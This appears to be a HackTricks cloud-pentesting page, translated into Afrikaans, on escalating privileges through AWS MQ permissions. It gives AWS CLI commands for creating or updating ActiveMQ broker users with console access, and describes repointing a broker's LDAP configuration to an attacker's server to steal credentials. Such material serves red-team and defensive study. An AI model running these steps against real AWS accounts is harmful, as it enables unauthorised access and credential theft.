AWS - MQ Privesc

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

MQ

Vir meer inligting oor MQ, kyk:

pageAWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Met hierdie toestemmings kan jy 'n nuwe gebruiker skep in 'n ActimeMQ-makelaar (dit werk nie in RabbitMQ nie):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Potensiële Impak: Toegang tot sensitiewe inligting deur te navigeer deur ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Met hierdie toestemmings kan jy 'n nuwe gebruiker skep in 'n ActimeMQ makelaar (dit werk nie in RabbitMQ nie):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Potensiële Impak: Toegang tot sensitiewe inligting deur te navigeer deur ActiveMQ

mq:ListBrokers, mq:UpdateBroker

As 'n makelaar LDAP gebruik vir outorisasie met ActiveMQ, is dit moontlik om die konfigurasie van die LDAP-bediener te verander na een wat deur die aanvaller beheer word. Op hierdie manier sal die aanvaller in staat wees om alle geloofsbriewe wat deur LDAP gestuur word, te steel.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

As jy op een of ander manier die oorspronklike geloofsbriewe wat deur ActiveMQ gebruik word, kon vind, kon jy 'n MitM uitvoer, die geloofsbriewe steel, hulle in die oorspronklike bediener gebruik, en die antwoord stuur (miskien deur net die gesteelde geloofsbriewe te hergebruik).

Potensiële Impak: Steel ActiveMQ geloofsbriewe

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated